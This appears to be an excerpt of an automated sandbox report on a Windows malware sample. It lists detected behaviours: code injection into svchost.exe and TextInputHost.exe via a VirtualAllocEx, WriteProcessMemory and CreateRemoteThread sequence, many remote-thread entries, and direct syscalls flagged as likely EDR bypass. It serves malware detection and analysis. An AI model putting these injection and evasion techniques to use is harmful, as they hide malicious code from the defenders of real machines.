            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: D90000 protect: page execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1580000 protect: page execute and read and writeJump to behavior
            Contains functionality to inject threads in other processes
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeCode function: 0_2_01291EF6 OpenProcess,GetLastError,GetVersionExA,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,OpenProcess,AdjustTokenPrivileges,CloseHandle,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,LookupAccountSidA,lstrcmpiA,lstrcmpiA,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualAllocEx,lstrlen,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,0_2_01291EF6
            Creates a thread in another existing process (thread injection)
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 2410000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 2460000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 2290000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 22A0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 950000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 960000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: BF0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: C00000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 340000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 350000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 1490000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 2E70000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 2470000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 25C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: F60000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: F70000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 21D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 2320000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 2930000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 2980000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 840000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 890000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 2460000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe EIP: 24B0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2260000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 22B0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: F20000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: F70000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2390000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 23E0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 25B0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 25C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2A90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2DE0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2D00000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2D60000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 9C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 9D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 1270000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 1280000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2DC0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2E10000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2EB0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2F00000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2330000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2380000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2450000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 24A0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2F50000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2F60000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 860000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2420000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 25D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2620000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 1170000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 1180000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2700000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2710000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2940000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2A90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 710000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 760000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2210000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2260000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: C40000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: C50000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 26E0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 26F0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 240000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 250000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: B20000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: B30000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 790000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 7A0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 22D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 22E0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 330000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 340000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 6E0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 730000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2270000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 22C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2DA0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2DF0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 14B0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 1500000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2610000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2660000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: F90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: FA0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: F60000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: F70000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 3C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 3D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: F90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: FE0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2920000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2970000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 6E0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 740000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2290000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 22B0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2800000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2810000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 24F0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2500000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2B60000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2BB0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: B00000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: B10000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 29A0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 29F0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 720000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2150000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: DF0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: E00000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: AE0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: B30000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2BC0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2BD0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 1250000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 1260000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 880000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 21B0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2DA0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2DF0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2330000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2380000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: AC0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: AD0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: F90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: FA0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2780000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2790000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 11A0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 11B0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2DD0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 3020000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 780000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 790000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 1370000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 13C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: B00000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: B10000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 14C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 14D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2500000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2560000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: C70000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: CC0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2940000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2950000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: AA0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: AF0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 7A0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 7B0000Jump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtMapViewOfSection: Direct from: 0x77762D1C
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtCreateMutant: Direct from: 0x777635CC
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtUnmapViewOfSection: Direct from: 0x77762D3CJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtSetValueKey: Direct from: 0x7776309CJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtResumeThread: Direct from: 0x777636AC
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtWriteFile: Direct from: 0x77762AFCJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtDeviceIoControlFile: Direct from: 0x77757B2EJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtEnumerateKey: Direct from: 0x77762DBCJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtDelayExecution: Direct from: 0x77762DDC
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtQueryInformationProcess: Direct from: 0x77762C26
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtAllocateVirtualMemory: Direct from: 0x77763C9CJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtClose: Direct from: 0x77762B6C
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtAllocateVirtualMemory: Direct from: 0x77762C6CJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtDeleteValueKey: Direct from: 0x777637FCJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtSetInformationFile: Direct from: 0x77762D0CJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtAllocateVirtualMemory: Direct from: 0x77762BECJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtSetInformationThread: Direct from: 0x77762ECC
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtTerminateThread: Direct from: 0x77762FCC
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtQuerySystemInformation: Direct from: 0x765E833CJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtQueueApcThread: Direct from: 0x77762EECJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
